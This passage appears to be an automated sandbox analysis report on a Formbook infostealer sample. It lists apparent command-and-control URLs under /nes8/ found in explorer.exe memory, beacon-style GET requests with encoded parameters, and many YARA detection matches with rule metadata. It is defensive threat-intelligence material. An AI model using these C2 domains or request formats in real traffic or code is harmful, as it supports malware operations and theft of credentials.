          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyoReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.com
          Source: explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top/nes8/www.innovativanimal.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.topReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com/nes8/www.marketproinv.info
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech/nes8/www.linnus.shop
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.techReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online/nes8/www.dietoll-official.site
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.onlineReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com/nes8/www.enakslot.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.comReferer:
          Source: unknown DNS traffic detected: queries for: www.swegon.tech
          Source: global traffic HTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1 Host: www.swegon.tech Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1 Host: www.linnus.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1 Host: www.incentiveexcellence.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: afhjjq.exe, 00000001.00000002.318596123.0000000000FBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\YSpCB8DEek.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          Source: Yara match File source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: afhjjq.exe PID: 4088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: afhjjq.exe PID: 2236, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 4980, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: YSpCB8DEek.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
